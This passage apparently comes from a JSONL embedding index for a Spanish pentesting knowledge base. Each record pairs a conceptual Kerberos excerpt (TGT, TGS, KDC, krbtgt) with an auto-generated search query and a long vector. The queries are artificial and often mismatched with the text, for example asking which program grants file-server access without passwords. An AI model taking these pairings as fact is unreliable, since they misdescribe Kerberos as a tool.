-0.06892, 0.10716, 0.06123, 0.00223, -0.03636, -0.02632, 0.13064, -0.0728, -0.00459, -0.06941, -0.27296, -0.06628, -0.02551, -0.06119, 0.24452, -0.05187, 0.00122, -0.07669, -0.08445, -0.00594, 0.04136, -0.12309, -0.0408, 0.01656, 0.07785, -0.06925, 0.01166, 0.0697, -0.12585, 0.07013, 0.03521, -0.0241, -0.02983, -0.06685, -0.00691, -0.00167, 0.05517, 0.07734, 0.0257, -0.09189, -0.07005, -0.03224, -0.10025, -0.03582, 0.01804, -0.14539, 0.07061, -0.04077, 0.04108, 0.03791, 0.01838, 0.02214, 0.03571, -0.01693, 0.05903, -0.09698, -0.01021, -0.01824, 0.09916, -0.05059, -0.06899, 0.08828, -0.01286, 0.00265, -0.02063, 0.03443, -0.03735, 0.05491, 0.0361, -0.02833, -0.05699, -0.01899, 0.00603, 0.01712, -0.04605, -0.05878, -0.05332, -0.1065, -0.01179, 0.03853, -0.0101, -0.01066, 0.01432, -0.03338, -0.04899, 0.14659, -0.01811, -0.08336, 0.01658, -0.05994, -0.03962, 0.00903, -0.01309, 0.0131, 0.01825, -0.07536, -0.01781, -0.08797, 0.0862, 0.03073, -1e-05, -0.05951, 0.07365, 0.06199, -0.087, -0.06065, -0.00931, -0.00481, 0.12942, -0.08781, 0.01518, 0.06861, -0.09987, 0.00443, 0.00084, 0.03046, -0.06921, 0.05766, -0.03183, -0.0073, 0.00169, 0.00479, -0.00468, 0.04227, 0.04831, -0.00254, 0.01958, 0.04906, 0.0397, 0.0322, 0.10163, -0.01702, 0.0168, -0.07978, -0.04641, -0.04825, 0.01678, -0.07483, 0.02363, -0.00843, 0.02509, -0.04451, 0.05143, -0.02548, -0.01343, 0.00845, -0.02009, 0.02857, -0.0018, 0.05304, -0.01614, -0.05298, 0.05524, 0.01632, -0.00395, -0.01701, 0.032, -0.00736, -0.02656, -0.01519, 0.01978, -0.04995, 0.02217, 0.0615, -0.08865, 0.02394, -0.06007, 0.03993, 0.04102, 0.01297, 0.04921, -0.0567, -0.04923, 0.01132, 0.0011, -0.00304, -0.0182, 0.02832, -0.03393, 0.01958, 0.08879, -0.00653, 0.01135, -0.03083, 0.01015, -0.01064, 0.01496, -0.01633, 0.00585, -0.02209, -0.03057, -0.00114, 0.03901, -0.01299, 0.02723, -0.01783, -0.05374, -0.06057, 0.02927, 0.03654, 0.00323, -0.03036, -0.02247, -0.01097, -0.02828, -0.01165, -0.0149, -0.04253, -0.01027, 0.01517, 0.06315, -0.01957, 0.00411, -0.00027]} -{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Kerberos\n\n> El protocolo de autenticaciΓ³n de Active Directory. Entender TGT vs TGS desbloquea media AD.", "indexar": "que programa sirve para entender la diferencia entre TGT y TGS en Active Directory", "v": [-0.17394, -0.0285, -0.14192, -0.0845, 0.15478, -0.03645, -0.11801, 0.03295, 0.03825, 0.15253, 0.03113, 0.02985, 0.00853, -0.02589, 0.08086, -0.04303, 0.10765, -0.22635, 0.03133, -0.01602, 0.05077, 0.00199, 0.05432, -0.15637, 0.07988, 0.00552, -0.04348, -0.13484, 0.03533, 0.04465, 0.06066, -0.04777, -0.03725, -0.16183, -0.06554, -0.02376, -0.0762, 0.05717, 0.08442, 0.01312, -0.01311, -0.00346, -0.03166, 0.10935, 0.11641, 0.02378, 0.08221, -0.01019, 0.02603, -0.00079, -0.10684, 0.04981, 0.04283, -0.06175, 0.01152, -0.00954, 0.01094, -0.03896, -0.10948, 0.00928, -0.0437, -0.1251, -0.05587, -0.11966, -0.01825, -0.11905, 0.12424, -0.04199, -0.09204, 0.02684, -0.11211, 0.02123, 0.03836, -0.0152, -0.00293, -0.00838, 0.04095, 0.05931, -0.05223, 0.01137, 0.06796, 0.00937, -0.03668, 0.09972, -0.07023, -0.07466, 0.02124, -0.05074, -0.00748, -0.01985, -0.00782, 0.20422, -0.06287, 0.11418, 0.05344, 0.00311, 0.08568, 0.03587, 0.09621, 0.0626, 0.07665, -0.07191, -0.01542, 0.08268, -0.05696, 0.11516, 0.04296, 0.02723, -0.0934, 0.10887, 0.05925, 0.00462, 0.00973, -0.01481, -0.00073, 0.06972, -0.04799, -0.00786, 0.07157, 0.0213, -0.09501, 0.00064, 0.01078, 0.01455, 0.0748, 0.01829, -0.04433, 0.10705, -0.0684, 0.12419, 0.02627, 0.09825, -0.06424, -0.04435, -0.03602, -0.09872, 0.05023, 0.0091, 0.03154, -0.07055, 0.01793, 0.04754, 0.03244, 0.06524, 0.01163, -0.03557, 0.04485, -0.00237, -0.0216, 0.08371, 0.02264, -0.05389, -0.0237, -0.03997, 0.01765, -0.05593, -0.03608, -0.08174, -0.03682, 0.03722, -0.01513, -0.00344, -0.01644, -0.11311, 0.03906, -0.07089, -0.10919, 0.00224, 0.09985, 0.05612, 0.02709, 0.0486, 0.03195, -0.0869, -0.04057, -0.02311, -0.00075, -0.05141, 0.04309, -0.01163, -0.04016, -0.00762, -0.04273, 0.01142, -0.00276, 0.01054, -0.06534, -0.04459, -0.04182, -0.03035, -0.02507, 0.03532, 0.00332, -0.07525, -0.05385, -0.02593, 0.05923, -0.02518, 0.05863, -0.02502, -0.02066, 0.00042, 0.05376, -0.02354, 0.05386, 0.03712, -0.02418, 0.10233, 0.09782, 0.0632, -0.01187, -0.01816, 0.02003, 0.03037, -0.07605, 0.03597, -0.00576, 0.08643, 0.02093, 0.07947, -0.05811, -0.02668, -0.00414, 0.04497, -0.01608, -0.08662, 0.05218, -0.05318, 0.01367, 0.04414, 0.0123, -0.00925, 0.08078, -0.02976, -0.03248, 0.046, -0.01729, -0.00055, -0.01137, -0.06499, 0.02249, 0.04406, 0.02057, 0.02079, 0.0117, -0.0026, -0.03103, 0.00356, -0.008, -0.01863, -0.08074, -0.01469, -0.00882, 0.00571, -0.05697, 0.07468]} -{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Kerberos\n\n> El protocolo de autenticaciΓ³n de Active Directory. Entender TGT vs TGS desbloquea media AD.", "indexar": "con que puedo aprender sobre el protocolo Kerberos y sus tickets", "v": [-0.06123, -0.00827, -0.13217, -0.17429, -0.06197, -0.18922, 0.11288, 0.11952, -0.03651, -0.13928, -0.05394, 0.07839, 0.08659, -0.06623, 0.08536, 0.02866, 0.0182, 0.0167, 0.20824, 0.01139, 0.06148, 0.05712, -0.05022, 0.03441, 0.09177, -0.02341, 0.08388, -0.03116, 0.01245, 0.00528, -0.07729, 0.02026, 0.01006, -0.0564, 0.00472, 0.03988, -0.04396, 0.17757, -0.06169, 0.04166, -0.11888, 0.04708, 0.01292, 0.1081, 0.02438, -0.02707, -0.07322, -0.00934, -0.00309, -0.11027, 0.03496, 0.02924, 0.02428, 0.00169, -0.08857, 0.03364, 0.01592, -0.1025, -0.00469, -0.00745, -0.01616, -0.13395, -0.06949, 0.00424, 0.00851, -0.08132, 0.09133, 0.04521, -0.10542, -0.01851, -0.03544, 0.03475, 0.06839, 0.04683, 0.03223, 0.02335, 0.00135, -0.0107, 0.13266, -0.00346, -0.09317, 0.01611, 0.04361, 0.04459, 0.05055, -0.01943, -0.05998, -0.00861, 0.02631, -0.03083, -0.07754, 0.15054, -0.03707, -0.11299, 0.08772, -0.10285, -0.10406, 0.01015, -0.03259, 0.01363, -0.09626, -0.06192, -0.0222, 0.01505, -0.03624, 0.10724, 0.04069, -0.01354, 0.00036, -0.02329, -0.11212, 0.08151, -0.06822, -0.01145, -0.05792, 0.02704, -0.01621, 0.11435, -0.02686, 0.08776, -0.00951, 0.02237, -0.02404, -0.07732, 0.05353, 0.00833, -0.01276, 0.21244, 0.05786, -0.01152, -0.02633, 0.07252, -0.04821, 0.00677, 0.02473, -0.0067, -0.08571, 0.00164, -0.10307, 0.00455, -0.01571, 0.07158, -0.07579, 0.01894, 0.043, -0.01523, 0.0336, -0.03532, -0.10664, -0.00149, -0.08849, 0.03341, 0.01689, 0.06011, -0.04796, 0.00022, 0.07126, -0.12803, 0.02595, 0.01331, -0.08598, 0.05234, 0.06867, -0.00014, 0.10216, 0.04937, -0.11426, -0.04924, 0.00847, 0.07226, 0.00798, 0.04065, 0.04816, 0.05951, -0.03504, -0.04998, -0.05144, -0.08281, -0.02876, -0.01959, -0.00167, -0.01488, -0.03742, -0.00426, 0.02097, -0.0197, 0.05177, -0.00134, 0.03646, 0.0268, -0.00974, -0.00955, -0.01344, 0.02246, -0.06891, -0.0299, -0.02022, 0.02609, -0.06123, -0.0193, -0.07592, 0.05044, 0.06141, -0.03172, 0.0891, 0.02812, -0.02035, -0.00139, -0.02655, 0.01912, 0.10804, -0.04736, 0.06595, -0.07075, -0.06228, -0.02234, -0.01617, -0.02585, -0.02497, 0.00096, 0.08546, 0.05981, 0.05221, -0.06494, -0.0153, -0.06447, -0.01054, 0.04201, 0.07075, 0.0158, -0.04047, 0.04388, 0.0144, 0.01991, 0.07371, 0.09076, -0.01218, -0.00791, -0.09196, -0.00101, 0.03146, 0.07231, -0.00011, -0.0462, -0.01298, -0.0548, -0.08683, -0.03505, 0.04762, -0.02546, -0.03066, -0.04017, 0.0769, 0.0249, -0.00889, -0.07591]} -{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Kerberos\n\n> El protocolo de autenticaciΓ³n de Active Directory. Entender TGT vs TGS desbloquea media AD.", "indexar": "cual es una herramienta para desbloquear conceptos bΓ‘sicos de autenticaciΓ³n en dominio", "v": [0.20917, 0.07518, -0.08862, -0.05903, 0.07982, -0.10648, 0.06097, -0.06897, -0.19827, 0.0547, -0.04356, -0.10381, -0.1099, -0.10363, 0.04736, 0.013, 0.1385, -0.12665, -0.1268, -0.04003, 0.00311, -0.14472, -0.04347, 0.03105, -0.09368, -0.13419, -0.03278, 0.0076, -0.12641, 0.07063, 0.0078, -0.0921, 0.09364, -0.01747, -0.04331, -0.07235, 0.0394, 0.09303, 0.01879, 0.05132, -0.00198, -0.0962, -0.00846, 0.09705, -0.02389, 0.00581, 0.02928, 0.04354, 0.02554, -0.09844, -0.00245, -0.11168, -0.1328, -0.07235, -0.01376, -0.08631, 0.28179, -0.06689, 0.01317, 0.00323, -0.13211, -0.0561, 0.01029, -0.04004, -0.07092, -0.09359, 0.02076, -0.00258, 0.00852, 0.1372, -0.0042, 0.02878, 0.08254, -0.017, 0.04807, 0.00444, 0.02933, -0.04763, 0.14283, 0.03915, 0.0903, -0.00016, -0.02467, 0.0016, -0.11296, -0.0341, 0.00137, -0.04131, 0.02118, -0.0393, -0.01702, 0.05268, -0.05473, -0.0599, -0.10114, 0.00371, 0.0545, 0.06591, -0.03417, -0.02935, 0.09927, -0.05627, -0.15597, 0.0736, 0.09327, -0.01315, 0.04073, -0.04252, -0.0702, -0.02052, 0.01223, -0.08418, -0.05218, -0.01718, -0.0588, 0.06022, -0.03491, -0.05646, -0.03101, -0.09569, -0.05488, 0.037, -0.04252, -0.03455, 0.0665, 0.04922, -0.02147, 0.0637, 0.01947, -0.11744, 0.0323, -0.01872, -0.06496, 0.0724, -0.0329, 0.0017, 0.10573, -0.08977, -0.03621, -0.04101, 0.02443, 0.02169, -0.05639, -0.078, 0.0344, -0.0082, 0.01922, -0.07988, -0.07794, 0.00245, -0.03471, -0.01579, -0.00065, 0.0874, -0.01996, 0.00015, -0.10116, 0.0036, -0.03988, 0.05638, -0.05243, -0.08117, -0.01205, -0.03949, 0.00026, -0.08578, 0.01847, -0.00514, 0.01482, 0.01729, 0.02979, 0.02155, 0.06061, 0.05785, -0.01736, -0.02955, -0.06552, -0.07209, -0.04898, -0.09062, -0.05735, -0.00957, -0.04307, 0.03364, -0.0039, 0.02178, 0.01803, -0.03645, -0.04362, 0.04385, -0.01689, -0.00242, -0.07683, -0.04425, 0.01248, 0.02856, -0.03732, -0.01126, 0.03843, 0.01238, 0.00978, -0.09299, 0.0081, -0.02857, 0.01909, 0.00935, -0.01309, -0.07394, -0.02976, 0.04935, 0.00496, -0.02631, 0.02398, -0.03615, -0.00909, -0.00409, -0.06762, 0.0264, -0.01915, -0.05898, 0.03959, 0.08051, 0.00241, -0.00106, -0.00509, -0.00041, -0.01633, -0.00121, 0.04422, -0.02795, 0.02012, -0.01042, -0.01766, 0.03678, 0.05757, 0.0269, 0.03848, -0.01025, -0.01823, 0.02991, 0.01043, 0.05004, 0.00169, -0.06663, -0.05853, -0.05295, -0.00728, 0.01474, -0.05663, -0.06952, 0.0056, 0.0149, 0.07348, 0.04291, 0.01063, -0.03786]} -{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## En 30 segundos\n```\nUsuario --(ΒΏpwd?)--> KDC (Domain Controller)\nUsuario <--(TGT: \"carnet maestro\")-- KDC\nUsuario --(TGT + \"quiero \\\\fileSrv\")--> KDC\nUsuario <--(TGS: ticket para fileSrv)-- KDC\nUsuario --(TGS)--> fileServer \"este ticket prueba que soy yo\"\n```", "indexar": "ΒΏQuΓ© programa permite acceder a un servidor de archivos sin contraseΓ±as?", "v": [0.01082, -0.00429, -0.02848, -0.2523, 0.01469, -0.17256, 0.02379, -0.18349, -0.03357, -0.02676, -0.085, -0.00509, -0.01225, -0.10091, 0.02301, 0.05063, 0.23066, -0.0385, 0.10044, 0.11946, 0.01489, 0.06513, 0.0232, -0.02146, -0.05188, -0.05902, 0.08539, 0.02196, -0.06026, -0.07537, -0.04534, -0.07613, 0.10323, 0.01502, 0.02844, 0.06759, 0.04388, 0.18986, -0.03708, 0.06271, 0.1032, 0.01347, -0.09329, 0.07557, 0.00542, -0.0654, 0.08092, -0.00857, 0.13351, -0.01448, -0.09459, -0.04121, -0.06846, -0.01481, -0.00802, -0.01809, 0.04217, -0.11292, 0.02881, 0.00292, -0.1483, 0.09247, 0.00316, -0.0171, -0.07344, -0.06259, 0.04694, 0.02762, -0.11737, 0.08345, -0.01125, 0.00568, 0.0174, 0.00169, -0.01067, 0.01902, -0.02409, -0.08954, 0.00393, 0.05731, 0.00179, 0.01604, 0.05979, 0.07316, -0.12508, -0.02189, 0.03886, 0.01727, 0.02909, -0.00041, 0.09116, 0.06906, -0.00459, 0.13961, 0.02436, -0.08202, 0.11034, -0.01808, -0.07441, -0.01895, 0.00159, 0.03195, -0.03676, 0.17634, -0.03099, 0.11611, 0.06373, -0.00244, -0.02176, -0.06746, 0.08306, 0.01245, -0.06158, 0.00838, -0.07648, 0.01308, 0.00078, -0.06951, 0.0498, -0.00713, -0.11147, 0.0102, 0.00916, 0.04129, 0.09166, 0.015, 0.07144, 0.07102, -0.11793, -0.02157, 0.04348, -0.00746, -0.05599, 0.01554, -0.06288, -0.01489, 0.07253, -0.0789, -0.09798, -0.03634, 0.02584, -0.00274, 0.01003, 0.05672, 0.10226, 0.01148, 0.05885, -0.07783, -0.0706, 0.00891, -0.03211, -0.02925, -0.0331, 0.00211, -0.08507, 0.01182, -0.0246, -0.14505, -0.13164, 0.10578, 0.00879, 0.01454, -0.05413, 0.02615, -0.03853, -0.03517, 0.04497, 0.0792, 0.07168, 0.07936, -0.01177, 0.09017, -0.00259, -0.04149, -0.03258, 0.01824, -0.03292, -0.12835, 0.05447, -0.01453, -0.06913, -0.01415, 0.01103, 0.01742, -0.02181, -0.07195, 0.04071, 0.01982, -0.02831, 0.01995, 0.0349, -0.01625, -0.0725, 0.02898, 0.01922, -0.05551, -0.06518, -0.02176, -0.01664, -0.0525, -0.01201, -0.03534, -0.03631, -0.01429, 0.04768, 0.04914, -0.05487, -0.01971, 0.0074, 0.04813, -0.03106, -0.01042, 0.07835, -0.02248, -0.04101, -0.0329, -0.00108, 0.03022, 0.02882, -0.03569, 0.00188, -0.00544, 0.05353, 0.06046, 0.02553, -0.0496, 0.01919, 0.02121, 0.05104, -0.02581, -0.02285, 0.00873, -0.05511, 0.02167, 0.07256, -0.02793, -0.05623, -0.04817, -0.01855, -0.07515, -0.03093, 0.09353, 0.03509, -0.04428, -0.043, -0.01949, -0.01602, -0.00964, -0.00838, 0.01899, -0.03459, 0.00292, 0.00067, -0.0202, 0.05582, 0.01272]} -{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## En 30 segundos\n```\nUsuario --(ΒΏpwd?)--> KDC (Domain Controller)\nUsuario <--(TGT: \"carnet maestro\")-- KDC\nUsuario --(TGT + \"quiero \\\\fileSrv\")--> KDC\nUsuario <--(TGS: ticket para fileSrv)-- KDC\nUsuario --(TGS)--> fileServer \"este ticket prueba que soy yo\"\n```", "indexar": "Con quΓ© herramienta puedo probar la autenticaciΓ³n de un usuario en una red?", "v": [-0.04218, 0.12069, -0.14881, -0.11107, 0.106, -0.02366, -0.05821, -0.02237, -0.07233, -0.1088, -0.12768, -0.07432, -0.00729, -0.03154, -0.00475, 0.03883, 0.08727, -0.01513, 0.01639, 0.0125, 0.08878, -0.12219, -0.15503, -0.05451, 0.03631, -0.0168, 0.11523, -0.02718, 0.0031, 0.05853, -0.02453, 0.03481, 0.05499, -0.0199, -0.14161, 0.02619, 0.04253, 0.04159, 0.06306, 0.08206, 0.0515, 0.01609, -0.03812, 0.08307, 0.03186, 0.09214, -0.0562, -0.03377, -0.101, 0.08107, -0.01466, -0.23244, -0.21908, -0.07676, -0.08583, -0.15353, 0.18412, -0.05699, 0.06512, -0.05982, -0.02704, -0.02791, -0.02106, 0.08196, -0.00293, -0.05337, -0.01245, -0.03907, -0.06871, 0.12208, 0.01869, 0.04776, -0.06053, -0.01113, 0.03865, 0.02437, 0.00289, -0.02372, 0.10254, -0.02811, 0.00073, 0.02277, -0.03608, -0.02378, -0.03137, -0.13806, 0.08166, -0.10578, 0.04887, -0.073, 0.05215, 0.01224, 0.10076, -0.00367, 0.06926, -0.05514, 0.09876, -0.11362, -0.01977, -0.06095, 0.10048, -0.01178, -0.12221, 0.08052, -0.02659, 0.00301, -0.03251, -0.03357, -0.00123, -0.03849, 0.02247, -0.08638, -0.09616, 0.03491, 0.01106, 0.05508, -0.05251, -0.08068, -0.07406, -0.09493, 0.02489, 0.01932, -0.05884, -0.06431, 0.05485, 0.00943, -0.07251, 0.09229, -0.01059, -0.07933, -0.03623, 0.01789, -0.05422, 0.01632, -0.01379, -0.00963, 0.00299, -0.17283, -0.00621, -0.03834, -0.00341, 0.05403, -0.05179, -0.12955, 0.04024, 0.05717, -0.06643, -0.04834, -0.09009, 0.03509, 0.00373, -0.06513, 0.00146, 0.04913, -0.07202, 0.04091, 0.01823, -0.01375, -0.04975, 0.06733, -0.06465, -0.0296, 0.00543, 0.00215, -0.00466, -0.07502, 0.01088, 0.00131, 0.05912, 0.02676, 0.00759, 0.0636, 0.0146, -0.05108, 0.03678, -0.04643, -0.07613, -0.0658, -0.00505, -0.12605, 0.0174, -0.02573, -0.02384, -0.06749, 0.03951, -0.06409, -0.01878, -0.00466, 0.03057, 0.06432, 0.00239, 0.04813, 0.0184, -0.02213, 0.06198, 0.05048, 0.04836, -0.03516, 0.00784, -0.04198, -0.06204, -0.02581, -0.01888, -0.0274, 0.04838, 0.02743, -0.03814, 0.03471, -0.0115, 0.0336, 0.04446, 0.0254, 0.06514, -0.04714, -0.0464, -0.01945, 0.03474, 0.04087, -0.03167, -0.01597, 0.06459, 0.01672, 0.02929, 0.04137, -0.00212, 0.04215, 0.02277, -0.03583, -0.01476, 0.00029, 0.0821, -0.03561, -0.03612, -0.0044, 0.0285, 0.00327, 0.08293, 0.02098, -0.0875, -0.04137, -0.0169, 0.06659, -0.02287, -0.03256, 0.01385, -0.03547, -0.04927, -0.0132, -0.03776, -0.101, -0.03636, 0.02098, 0.08032, -0.07087, 0.0234, -0.0141]} -{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## En 30 segundos\n```\nUsuario --(ΒΏpwd?)--> KDC (Domain Controller)\nUsuario <--(TGT: \"carnet maestro\")-- KDC\nUsuario --(TGT + \"quiero \\\\fileSrv\")--> KDC\nUsuario <--(TGS: ticket para fileSrv)-- KDC\nUsuario --(TGS)--> fileServer \"este ticket prueba que soy yo\"\n```", "indexar": "ΒΏCΓ³mo verifico si tengo un acceso seguro a un servicio especΓ­fico?", "v": [-0.21973, 0.15979, -0.25724, -0.01958, 0.03018, -0.12813, -0.04328, -0.11492, -0.04795, -0.12255, -0.08734, -0.04127, -0.00207, -0.07001, 0.1377, -0.04544, 0.1025, -0.11291, 0.08999, 0.15207, 0.14909, -0.11932, -0.09179, -0.00638, -0.04894, 0.00369, 0.04748, -0.0404, -0.12199, -0.0035, 0.08396, -0.021, 0.09737, 0.06383, -0.07747, 0.03284, 0.09728, 0.04926, 0.08511, 0.06193, 0.05128, -0.08552, 0.00827, 0.0379, 0.0362, -0.04537, 0.02881, -0.00077, -0.00548, -0.01459, 0.00649, -0.01464, -0.1067, -0.15194, -0.19283, 0.03284, 0.04684, 0.03135, 0.09803, -0.04491, -0.03753, -0.05164, 0.0656, 0.09634, 0.06087, -0.09263, 0.05711, 0.0433, 0.03136, -0.05705, -0.11181, -0.07851, 0.05499, 0.05344, -0.05927, -0.02212, 0.05762, -0.02704, 0.02214, 0.02833, 0.05469, 0.08739, -0.00282, -0.02232, -0.16159, 0.03742, -0.04082, -0.01216, -0.01498, -0.03207, 0.09371, 0.07159, -0.06908, 0.05113, -0.12805, 0.01866, -1e-05, -0.01527, -0.05411, -0.04663, 0.07347, -0.03475, 0.02251, 0.11001, -0.06003, -0.03863, -0.01514, 0.00281, -0.05848, -0.07835, 0.00314, 0.03563, -0.07249, -0.05437, 0.00426, 0.01041, -0.03209, -0.03552, 0.0799, -0.02412, -0.07161, -0.00263, 0.0833, -0.0654, 0.12049, -0.05366, -0.01919, 0.0634, -0.03091, 0.05392, -0.04455, 0.05617, -0.06883, -0.03742, 0.0155, -0.01295, -0.02266, -0.10693, 0.00242, 0.081, 0.06273, 0.00561, 0.00268, -0.0023, 0.05906, 0.02684, -0.03736, 0.00449, -0.10624, 0.05502, -0.05986, -0.02012, -0.04614, 0.0879, -0.03438, 0.05985, 0.0615, -0.06193, 0.02368, 0.08122, 0.01152, -0.00547, 0.06817, -0.03402, 0.03706, 0.04986, 0.01187, 0.00959, -0.01352, -0.03016, -0.03073, 0.0275, -0.02579, -0.07513, -0.00569, 0.01329, -0.09192, -0.05289, 0.02598, 0.00281, -0.05145, 0.00049, -0.04462, 0.00878, -0.02738, -0.0348, 0.0313, -0.04482, 0.01653, 0.06621, 0.04386, -0.05653, -0.00028, 0.0307, 0.01591, -0.03516, -0.04729, -0.04301, -0.04292, 0.00963, -0.06192, -0.00397, -0.00758, 0.00161, 0.01442, 0.00361, -0.01799, 0.02378, 0.00387, 0.06968, 0.00822, 0.02759, 0.13247, 0.03486, -0.02668, 0.03178, 0.01926, 0.01332, -0.00332, 0.00397, 0.0034, -0.01939, -0.00173, 0.04875, -0.02631, -0.01355, 0.00657, 0.00612, 0.02894, 0.06328, 0.02483, 0.03396, -0.05826, 0.02873, 0.04708, 0.03001, 0.04342, 0.01122, -0.02946, -0.03394, 0.10535, 0.0882, -0.00227, -0.0156, -0.02836, 0.01417, -0.08631, 0.03267, -0.09194, -0.00781, 0.04283, -0.03079, 0.00119, -0.02158, 0.04821, -0.05551]} -{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Conceptos\n- **TGT** = carnet maestro del KDC. Lo guarda el cliente.\n- **TGS** = ticket de un servicio concreto.\n- **krbtgt** = la cuenta que **firma TODOS los TGT**.", "indexar": "que programa me permite gestionar las cuentas krbtgt?", "v": [0.09847, 0.02867, 0.02662, -0.20326, 0.14343, -0.15827, 0.07076, 0.13045, -0.20511, -0.10505, -0.10142, -0.0656, 0.0538, -0.02232, 0.02854, 0.0232, -0.05979, -0.0234, -0.00062, 0.04214, 0.05116, -0.0996, 0.08687, 0.01425, -0.10929, -0.02868, 0.09656, -0.029, -0.05371, 0.10606, 0.02122, -0.0583, -0.03942, -0.05373, 0.08065, 0.00242, -0.04642, 0.07856, 0.02482, 0.03451, 0.07441, -0.08575, 0.04207, 0.12493, 0.16815, -0.10487, -0.00573, 0.00091, 0.00369, 0.06213, -0.08434, -0.02444, -0.10857, 0.06076, -0.06127, -0.04754, -0.05405, -0.15162, -0.05274, -0.01726, -0.00818, 0.00087, 0.0279, 0.0118, -0.01856, 0.0228, 0.10101, 0.01052, -0.06109, 0.07414, -0.07147, 0.05071, -0.06269, 0.02126, -0.01061, -0.0565, 0.07076, -0.00227, -0.00691, -0.05573, -0.04758, -0.12962, -0.01749, 0.05439, -0.05616, -0.08691, 0.03732, -0.00026, -0.01496, -0.01702, 0.00956, -0.05105, 0.02129, 0.05471, 0.00819, 0.05213, 0.09766, 0.06188, -0.03329, 0.03987, -0.02695, 0.0682, -0.14615, 0.0788, -0.067, 0.13538, 0.08707, -0.06758, 0.00868, 0.00445, -0.02365, 0.009, -0.07506, -0.05662, -0.02083, 0.10267, -0.03837, -0.04973, 0.09213, -0.04741, -0.07347, -0.0255, 0.04587, 0.03389, 0.13085, -0.08516, -0.05905, 0.09192, 0.0037, 0.10549, -0.08009, -0.01342, 0.07991, 0.00896, -0.06093, -0.08361, -0.09258, 0.04922, -0.03323, -0.08282, -0.1612, 0.08203, 0.00607, -0.09919, 0.03363, -0.05927, 0.0065, -0.08992, 0.07283, 0.1018, 0.03184, -0.04392, -0.05963, 0.05038, -0.0287, -0.04314, 0.01394, 0.01257, -0.10653, 0.0237, -0.02567, -0.03492, 0.00761, 0.03243, 0.04372, -0.08033, 0.02077, 0.0639, 0.09061, 0.0034, -0.01628, 0.10539, 0.07273, 0.0595, 0.03151, -0.0493, 0.0143, -0.12838, 0.01041, 1e-05, -0.10832, 0.02265, 0.10604, -0.03061, -0.01509, -0.03615, -0.04491, 0.07751, 0.02266, -0.00354, -0.01015, 0.04162, -0.04181, -0.03218, -0.00978, -0.0039, 0.00754, -0.00743, 0.02855, -0.01078, -0.04813, 0.05787, 0.02024, -0.01098, -0.0224, 0.07639, 0.00505, 0.10908, 0.00819, 0.01066, 0.03344, -0.04068, 0.05807, -0.03544, -0.02515, -0.00412, -0.02702, -0.01411, 0.04576, 0.03504, -0.02132, -0.0507, 0.04616, 0.0173, 0.01553, -0.06173, 0.04441, -0.02637, -0.00435, 0.0035, -0.05918, -0.02162, -0.00476, 0.03284, 0.00751, -0.01633, -0.0108, -0.03485, 0.02628, -0.05359, -0.0173, 0.05494, 0.03972, -0.02682, -0.0599, 0.00985, -0.06913, 0.03294, -0.0177, -0.0361, 0.00943, -0.01909, 0.00146, -0.01147, 0.04787, 0.03416]} -{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Conceptos\n- **TGT** = carnet maestro del KDC. Lo guarda el cliente.\n- **TGS** = ticket de un servicio concreto.\n- **krbtgt** = la cuenta que **firma TODOS los TGT**.", "indexar": "cual es una herramienta para administrar tickets KDC y TGS?", "v": [-0.11133, -0.09733, 0.00113, -0.07777, 0.10204, -0.1065, -0.02293, 0.13626, -0.03154, 0.13941, -0.08638, -0.08148, -0.08369, -0.07169, 0.04791, -0.05433, 0.17065, -0.15148, 0.10061, 0.0316, 0.04096, -0.00329, 0.00017, -0.01129, -0.03292, -0.04686, 0.08373, -0.10368, -0.23775, -0.01151, 0.08009, -0.0692, -0.04934, -0.14336, -0.00262, -0.04804, -0.05674, 0.17889, 0.07107, 0.04242, -0.05451, -0.04259, -0.02996, 0.07379, 0.0236, -0.0905, 0.08388, 0.01524, 0.0389, -0.05854, -0.11842, -0.08771, -0.08597, 0.02835, -0.03444, -0.10929, 0.15546, -0.07728, 0.00177, 0.01623, -0.10211, -0.00336, -0.10371, 0.01008, -0.09438, -0.02507, 0.04019, -0.10048, -0.11378, 0.01397, -0.085, 0.05574, 0.09005, -0.00479, 0.03349, 0.03632, 0.09968, 0.09238, 0.09804, -0.02768, 0.00751, 0.00225, -0.05063, 0.03499, -0.06223, -0.10596, 0.07776, -0.05812, -0.01448, 0.01742, -0.03744, 0.01987, 0.00474, 0.02458, 0.05205, -0.06589, 0.05901, -0.05607, -0.00875, -0.00176, 0.04149, -0.0248, -0.06176, 0.04904, -0.13453, 0.02974, 0.03598, -0.03842, -0.06339, 0.01806, 0.07308, 0.06948, -0.02994, 0.11002, 0.04014, 0.07449, -0.03197, -0.00676, 0.00246, -0.05806, 0.04741, 0.00681, -0.02141, -0.15124, 0.11385, 0.01123, -0.04696, 0.03807, -0.01145, -0.081, 0.05615, -0.03927, -0.10288, 0.02799, -0.04351, -0.0629, 0.00039, -0.08331, 0.01441, -0.03723, 0.00847, 0.04232, 0.05829, -0.08414, 0.13121, 0.01938, -0.00088, -0.00477, -0.03786, 0.02616, 0.08608, -0.06266, 0.00802, 0.00933, -0.03113, 0.0154, -0.03419, -0.01456, -0.09251, 0.01349, -0.06526, -0.01312, 0.08267, 0.02136, 0.00444, -0.07274, -0.03326, -0.01906, 